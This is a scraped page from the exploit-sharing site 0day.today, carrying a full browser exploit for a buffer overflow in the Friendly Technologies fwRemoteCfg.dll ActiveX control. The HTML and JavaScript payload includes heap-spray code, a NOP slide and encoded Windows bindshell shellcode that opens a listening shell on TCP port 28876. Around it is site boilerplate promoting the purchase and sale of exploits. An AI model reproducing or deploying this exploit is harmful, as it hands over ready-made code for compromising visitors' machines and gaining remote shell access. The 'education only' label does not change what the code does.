0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Friendly Technologies (fwRemoteCfg.dll) ActiveX Remote BOF Exploit
================================================================== Friendly Technologies (fwRemoteCfg.dll) ActiveX Remote BOF Exploit ================================================================== <!-- "Friendly Technologies" provide software like L2TP and PPPoE clients to ISPs, who give the software to their customers on CD so they have less trouble setting up thire connections. They also provide remote configuration solutions .. not the best idea if you ask me. An overflow exists in fwRemoteCfg.dll provided with the dialer, an example of the dialer can be found here: ========================================================== || Greetz to the binaryvision crew || || Come visit @ http://www.binaryvision.org.il || || or IRC at irc.nix.co.il / #binaryvision || ========================================================== * Tested on WinXP SP2 using IE6. ** For Education ONLY! *** Written by spdr. (spdr01 [at] gmail.com) --> <html> <title>Friendly Technologies - wayyy too friendly...</title> <object classid="clsid:F4A06697-C0E7-4BB6-8C3B-E01016A4408B" id="sucker"></object> <input type="button" value="Exploit!" onClick="exploit()"> <script> function exploit() { var Evil = ""; // Our Evil Buffer var DamnIE = "\x0C\x0C\x0C\x0C"; // Damn IE changes address when not in the 0x00 - 0x7F range :( // Need to use heap spray rather than overwrite EIP ... // Skyland win32 bindshell (28876/tcp) shellcode var ShellCode = unescape("%u4343%u4343%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb"); var payLoadSize = ShellCode.length * 2; // Size of the shellcode var SprayToAddress = 0x0C0C0C0C; // Spray up to there, could make it shorter. var spraySlide = unescape("%u9090%u9090"); // Nop slide var heapHdrSize = 0x38; // size of heap header blocks in MSIE, hopefully. var BlockSize = 0x100000; // Size of each block var SlideSize = BlockSize - (payLoadSize + heapHdrSize); // Size of the Nop slide var heapBlocks = (SprayToAddress - 0x100000) / BlockSize; // Number of blocks spraySlide = MakeNopSlide(spraySlide, SlideSize); // Create our slide // [heap header][nopslide][shellcode] memory = new Array(); for (k = 0; k < heapBlocks; k++) memory[k] = spraySlide + ShellCode; // Create Evil Buffer while(Evil.length < 800) Evil += "A"; Evil += DamnIE; // Pwn sucker.CreateURLShortcut("con", "con", Evil, 1); // Using 'con' as filename, we dont really want to make a file. } function MakeNopSlide(spraySlide, SlideSize){ while(spraySlide.length * 2 < SlideSize) spraySlide += spraySlide; spraySlide = spraySlide.substring(0, SlideSize / 2); return spraySlide; } </script> </html> # 0day.today [2024-12-25] #